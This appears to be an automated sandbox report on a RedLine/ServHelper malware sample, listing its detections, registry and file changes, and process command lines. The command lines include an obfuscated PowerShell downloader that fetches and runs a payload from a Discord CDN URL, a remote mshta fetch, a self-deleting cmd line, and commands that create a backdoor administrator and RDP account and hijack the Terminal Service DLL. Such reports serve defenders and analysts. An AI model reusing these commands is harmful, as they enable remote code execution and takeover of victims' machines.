Analysis Overview
SHA256
f60f32ec899bcb92fd50491a8c32f0548afbd4dc02462dfa373d484b4b161a86
Threat Level: Known bad
The file f618840fdc6d40a683f35a268444ad53 was found to be: Known bad.
Malicious Activity Summary
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
RedLine Payload
suricata: ET MALWARE ServHelper CnC Inital Checkin
RedLine
ServHelper
Grants admin privileges
Sets DLL path for service in the registry
UPX packed file
Downloads MZ/PE file
Possible privilege escalation attempt
Executes dropped EXE
Blocklisted process makes network request
Modifies RDP port number used by Windows
Deletes itself
Modifies file permissions
Loads dropped DLL
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
autoit_exe
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-14 06:48
Signatures
autoit_exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-14 06:48
Reported
2021-08-14 06:51
Platform
win7v20210410
Max time kernel
128s
Max time network
161s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ServHelper
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1261989323.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\clr.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1696 set thread context of 732 | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | C:\Users\Admin\AppData\Local\Temp\1550642269.exe |
| PID 1696 set thread context of 560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f798d1b-489d-4b83-9b14-670c33cb8ef5 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fef9581a-1e37-4a4c-9f80-e951c13921a4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99f3e17c-4698-4db9-96ef-7e68af737730 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_34edabfb-a2d6-4b7d-a613-773c073a3b0e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_200392e4-b224-4513-aae4-49b6df4e6ea0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9df83c12-38e8-4240-8db6-9197e607e181 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_efb4baf2-1462-4114-b5fa-e63c9eca6af1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9b9662a0-387e-409c-99af-c69341e7ccac | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_760afb4c-cf87-46ae-a147-0ee3fcb6d7b7 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_40e286a5-0406-44a8-9f6a-0d129d327baf | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I1VS2SPHY69JNCZOYJDR.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_650d3c54-d93d-47a5-9daa-9584e06593e0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074253d9bc7ab1a4f8b9090448ede0ef9000000000200000000001066000000010000200000007da4992bf9230c93b78bf6b68fb987b2392140f05f421a33b823d4bfeb369082000000000e80000000020000200000002b4735b491d2252ffd33e5d74f971708637ff6a66bafa6bd9d49e63d1c990332200000003b9d3e5eca4b6a235145b5bf9c2a71861edb9a724a00a4b2f1f67c4b36bd6e9a40000000be6602838ce0ee33bdc7782941504684305f927a2ee6d72925e58ed3c3781ffb4a1ae8c811d832001470e994e6057990bdf8ad347c28973a677409d986ea153c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{38151021-FCCC-11EB-BE93-726C7BD0CD11} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 902ac60ed990d701 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "335688935" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 882dd222d990d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.binance.com/en/register?ref=WDA8929C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
C:\Windows\SysWOW64\PING.EXE
ping 0
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1688 CREDAT:275457 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Users\Admin\AppData\Local\Temp\clr.exe
"C:\Users\Admin\AppData\Local\Temp\clr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9656.tmp" "c:\Users\Admin\AppData\Local\Temp\li0ngda1\CSC68A5B573BB724897BDD73A04FCEFF5F.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bgcKKZ66 /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bgcKKZ66 /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66 /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bgcKKZ66
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bgcKKZ66
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
